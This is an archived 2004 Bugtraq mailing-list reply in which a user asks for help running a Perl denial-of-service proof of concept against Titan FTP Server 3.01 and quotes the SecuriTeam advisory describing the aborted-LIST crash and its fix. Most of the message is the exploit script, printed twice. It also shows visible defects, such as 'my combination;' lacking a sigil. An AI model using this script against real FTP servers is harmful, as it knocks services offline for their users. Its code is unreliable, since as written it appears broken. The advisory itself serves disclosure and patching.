NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2004-05

Re: Titan FTP Server Aborted LIST DoS

From: Gene Ken (gkenvip.sina.com)
Date: Thu May 06 2004 - 21:19:59 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi Aviram,

I have some trouble with the testing of current exploit, the below
is my tested procedure:

1) In my test bed, the host side is winxp professional with ip_addr 192.168.0.2
(english, 5.1 build 2600), and the client side is redhat linux 9 using
NAT in
Vmware Workstation 4.5.1 build-7568 with ip_addr 192.168.92.3.

2) I have successfully Titan Ftp Server v3.01 Build 163 installed on Winxp Pro
platform. also the perl script u mentioned in ur article has successfully
executed like as the below:

/* on my redhat box, i use ftp to verify if the titan ftp server is
running, the
result is the info as below: */

[gkenrh9 gken]$ ftp 192.168.0.2
Connected to 192.168.0.2 (192.168.0.2).
220 Titan FTP Server 3.01.163 Ready.
Name (192.168.0.2:gken): gken
331 User name okay, need password.
Password:
230-Welcome gken from 192.168.0.2. You are now logged in to the server.
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.

/* executing titan.pl script */
[gkenrh9 gken]$ perl titan.pl
Combination:
cannot connect to ftp daemon on 192.168.0.2 at titan.pl line 22.

how to tackle this? thx in advance!

---the titan.pl---
  #!/usr/bin/perl
  # Test for Titan FTP server security vulnerability
  #
  # Orkut users? Come join the SecuriTeam community
  # http://www.orkut.com/Community.aspx?cmm=44441
  #
  use IO::Socket;

$host = "192.168.0.2";

my combination;
$combination[0] = "LIST \r\n";

  for (my $i = 0; $combination[$i] ; $i++)
  {
   print "Combination: $1\n";

   $remote = IO::Socket::INET->new ( Proto => "tcp",
       PeerAddr => $host,
       PeerPort => "2112",
       );
   unless ($remote) { die "cannot connect to ftp daemon on $host" }

   print "connected\n";
   while (<$remote>)
   {
    print $_;
    if (/220 /)
    {
     last;
    }
   }

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;

   while (<$remote>)
   {
    print $_;
    if (/331 /)
    {
     last;
    }
   }

   $ftp = "PASS a\b.com\r\n";
   print $remote $ftp;
   print $ftp;

   while (<$remote>)
   {
    print $_;
    if (/230 /)
    {
     last;
    }
   }

$ftp = $combination[$i];

print $remote $ftp;
print $ftp;

   while (<$remote>)
   {
    print $_;
    if (/150 /)
    {
     last;
    }

close $remote;
}
}

At 05:51 AM 5/5/2004, you wrote:
> Titan FTP Server Aborted LIST DoS
>----------------------------------------------------
>
>
>Article reference:
>http://www.securiteam.com/windowsntfocus/5RP0215CUU.html
>
>
>SUMMARY
>
>A security vulnerability exists in South River Technologies' Titan FTP
>Server.
>An attacker issuing a LIST command and disconnecting before the LIST command
>had the time to connect, will cause the program to try and access an invalid
>socket. This will result in the FTP service's crash (and in turn, no longer
>being able to service any additional users).
>
>
>DETAILS
>
>Vulnerable Systems:
> * Titan FTP Server version 3.01 build 163
>
> Immune Systems:
> * Titan FTP Server version 3.10 build 169
>
> Solution:
> To solve this issue upgrade to the latest version (3.10 build 169 or newer).
>
> Exploit:
> #!/usr/bin/perl
> # Test for Titan FTP server security vulnerability
> #
> # Orkut users? Come join the SecuriTeam community
> # http://www.orkut.com/Community.aspx?cmm=44441
> #
> use IO::Socket;
>
> $host = "192.168.1.243";
>
> my combination;
> $combination[0] = "LIST \r\n";
>
> for (my $i = 0; $combination[$i] ; $i++)
> {
> print "Combination: $1\n";
>
> $remote = IO::Socket::INET->new ( Proto => "tcp",
> PeerAddr => $host,
> PeerPort => "2112",
> );
> unless ($remote) { die "cannot connect to ftp daemon on $host" }
>
> print "connected\n";
> while (<$remote>)
> {
> print $_;
> if (/220 /)
> {
> last;
> }
> }
>
> $remote->autoflush(1);
>
> my $ftp = "USER anonymous\r\n";
>
> print $remote $ftp;
> print $ftp;
>
> while (<$remote>)
> {
> print $_;
> if (/331 /)
> {
> last;
> }
> }
>
> $ftp = "PASS a\b.com\r\n";
> print $remote $ftp;
> print $ftp;
>
> while (<$remote>)
> {
> print $_;
> if (/230 /)
> {
> last;
> }
> }
>
> $ftp = $combination[$i];
>
> print $remote $ftp;
> print $ftp;
>
> while (<$remote>)
> {
> print $_;
> if (/150 /)
> {
> last;
> }
>
>
> close $remote;
> }
>
>
>ADDITIONAL INFORMATION
>
>SecurITeam would like to thank <mailto:stormsecuriteam.com> STORM for
>finding this vulnerability.
>
>
>
>
>Regards,
>Aviram Jenik
>Beyond Security Ltd.
>
>http://www.BeyondSecurity.com
>http://www.SecuriTeam.com
>
>The First Integrated Network and Web Application Vulnerability Scanner:
>http://www.beyondsecurity.com/webscan-wp.pdf
>
>
>
>
>====================
>====================
>
>DISCLAIMER:
>The information in this bulletin is provided "AS IS" without warranty of any
>kind.
>In no event shall we be liable for any damages whatsoever including direct,
>indirect, incidental, consequential, loss of business profits or special
>damages.

Regards,

Gene Ken
86-10-62928315 (Home)
86-13901016339 (Cell)
/* Out of intense complexities, emerge intense simplicities. */

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]